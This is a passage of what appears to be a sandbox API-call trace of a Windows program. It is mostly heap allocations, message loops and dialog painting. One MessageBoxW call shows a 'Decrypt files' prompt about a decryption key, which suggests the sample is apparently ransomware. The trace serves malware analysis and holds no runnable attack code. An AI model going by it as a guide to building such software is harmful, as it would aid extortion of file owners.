hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.745] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.745] Sleep (dwMilliseconds=0x0) [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.745] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.745] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.745] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.746] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.746] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.746] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.746] Sleep (dwMilliseconds=0x0) [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.746] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.746] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.746] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.747] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.747] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.747] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.747] Sleep (dwMilliseconds=0x0) [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.747] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.747] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.747] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.748] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.748] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.748] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.748] Sleep (dwMilliseconds=0x0) [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.748] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.748] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.748] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.749] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.749] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.749] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.749] Sleep (dwMilliseconds=0x0) [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.749] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.749] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.749] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.750] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.750] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.750] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.750] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe17a20 [0268.750] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.750] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe17a20 | out: hHeap=0xb80000) returned 1 [0268.750] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.750] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.750] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.750] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.750] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.750] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.750] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.750] Sleep (dwMilliseconds=0x0) [0268.830] MessageBoxW (hWnd=0x0, lpText="Your files will be decrypted if the decryption key was correct", lpCaption="Decrypt files", uType=0x10040) returned 1 [0268.847] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.847] NtdllDialogWndProc_W () returned 0x1 [0268.848] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.848] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.848] NtdllDialogWndProc_W () returned 0x0 [0268.851] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.851] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.851] NtdllDialogWndProc_W () returned 0x0 [0268.856] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.856] NtdllDialogWndProc_W () returned 0x1 [0268.856] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.856] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.856] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.857] SetBkColor (hdc=0x280101eb, color=0xf0f0f0) returned 0xffffff [0268.857] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.857] NtdllDialogWndProc_W () returned 0x0 [0268.857] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.857] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.857] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.857] SetBkColor (hdc=0x280101eb, color=0xf0f0f0) returned 0xf0f0f0 [0268.857] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.857] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.857] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.857] NtdllDialogWndProc_W () returned 0x0 [0268.857] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.858] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.858] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.858] NtdllDialogWndProc_W () returned 0x0 [0268.873] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.873] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.873] NtdllDialogWndProc_W () returned 0x0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] NtdllDialogWndProc_W () returned 0x1 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.874] SetBkColor (hdc=0x5b01008e, color=0xf0f0f0) returned 0xffffff [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] NtdllDialogWndProc_W () returned 0x0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.874] SetBkColor (hdc=0x5b01008e, color=0xf0f0f0) returned 0xf0f0f0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.874] NtdllDialogWndProc_W () returned 0x0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.874] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.874] NtdllDialogWndProc_W () returned 0x0 [0268.875] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.875] NtdllDialogWndProc_W () returned 0x1 [0268.875] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.875] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.875] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.875] SetBkColor (hdc=0x2a0101eb, color=0xf0f0f0) returned 0xffffff [0268.875] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.875] NtdllDialogWndProc_W () returned 0x0 [0268.875] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.875] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.875] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.875] SetBkColor (hdc=0x2a0101eb, color=0xf0f0f0) returned 0xf0f0f0 [0268.877] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.877] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.877] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.877] NtdllDialogWndProc_W () returned 0x0 [0268.877] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.877] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.878] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.878] NtdllDialogWndProc_W () returned 0x0 [0268.878] GetForegroundWindow () returned 0x7014c [0268.878] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0268.908] GetForegroundWindow () returned 0x7014c [0268.908] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0268.950] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc7618 [0268.950] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff30 [0268.950] Shell_NotifyIconW (dwMessage=0x1, lpData=0x75ebd8) returned 1 [0268.951] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7618 | out: hHeap=0xb80000) returned 1 [0268.951] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.951] KillTimer (hWnd=0x60172, uIDEvent=0x1) returned 1 [0268.951] SetTimer (hWnd=0x60172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0268.956] GetForegroundWindow () returned 0x7014c [0268.956] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0269.001] GetForegroundWindow () returned 0x7014c [0269.001] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0269.040] GetForegroundWindow () returned 0x7014c [0269.040] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0269.090] GetForegroundWindow () returned 0x7014c [0269.090] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0269.140] GetForegroundWindow () returned 0x7014c [0269.140] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0269.187] GetForegroundWindow () returned 0x7014c [0269.187] GetWindowLongW (hWnd=0x7014c, nIndex=-21) returned 7730976 [0269.211] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.212] NtdllDialogWndProc_W () returned 0x0 [0269.213] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.213] NtdllDialogWndProc_W () returned 0x1 [0269.213] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.213] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.213] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.213] SetBkColor (hdc=0x8101070d, color=0xf0f0f0) returned 0xf0f0f0 [0269.215] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.215] NtdllDialogWndProc_W () returned 0x0 [0269.216] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.216] NtdllDialogWndProc_W () returned 0x0 [0269.217] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.217] NtdllDialogWndProc_W () returned 0x1 [0269.217] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.217] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.217] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.217] SetBkColor (hdc=0x8101070d, color=0xf0f0f0) returned 0xf0f0f0 [0269.217] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.218] NtdllDialogWndProc_W () returned 0x0 [0269.219] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.219] NtdllDialogWndProc_W () returned 0x0 [0269.220] NtdllDefWindowProc_W () returned 0x0 [0269.220] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.220] NtdllDialogWndProc_W () returned 0x1 [0269.221] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.221] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.221] NtdllDialogWndProc_W () returned 0x0 [0269.223] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0269.224] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ad0 | out: hHeap=0xb80000) returned 1 [0269.224] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98ec0 | out: hHeap=0xb80000) returned 1 [0269.224] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98e60 | out: hHeap=0xb80000) returned 1 [0269.224] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aff0 | out: hHeap=0xb80000) returned 1 [0269.224] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf7d8 | out: hHeap=0xb80000) returned 1 [0269.224] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.224] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.224] TranslateMessage (lpMsg=0x75f90c) returned 0 [0269.224] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0269.224] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.224] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.224] TranslateMessage (lpMsg=0x75f90c) returned 0 [0269.224] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0269.224] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.224] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.224] GetWindowLongW (hWnd=0xa0170, nIndex=-20) returned 256 [0269.224] NtdllDialogWndProc_W () returned 0x1 [0269.224] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.224] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.224] GetClientRect (in: hWnd=0xa0170, lpRect=0x75f658 | out: lpRect=0x75f658) returned 1 [0269.224] GetCursorPos (in: lpPoint=0x75f668 | out: lpPoint=0x75f668*(x=883, y=506)) returned 1 [0269.224] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f668 | out: lpPoint=0x75f668) returned 1 [0269.225] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0269.225] SetCursor (hCursor=0x10003) returned 0x10003 [0269.225] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.225] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0269.225] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.225] NtdllDialogWndProc_W () returned 0x0 [0269.225] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.225] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.225] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0269.225] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.225] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.225] BeginPaint (in: hWnd=0xa0170, lpPaint=0x75f600 | out: lpPaint=0x75f600) returned 0x8101070d [0269.225] EndPaint (hWnd=0xa0170, lpPaint=0x75f600) returned 1 [0269.225] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0269.225] TranslateAcceleratorW (hWnd=0xa0170, hAccTable=0x19010b, lpMsg=0x75f90c) returned 0 [0269.225] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0269.226] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.226] NtdllDialogWndProc_W () returned 0x1 [0269.226] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.226] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.226] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.226] SetBkColor (hdc=0x2a0101eb, color=0xf0f0f0) returned 0xf0f0f0 [0269.226] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.226] NtdllDialogWndProc_W () returned 0x0 [0269.226] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.226] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0269.226] GetSysColor (nIndex=15) returned 0xf0f0f0 [0269.227] SetBkColor 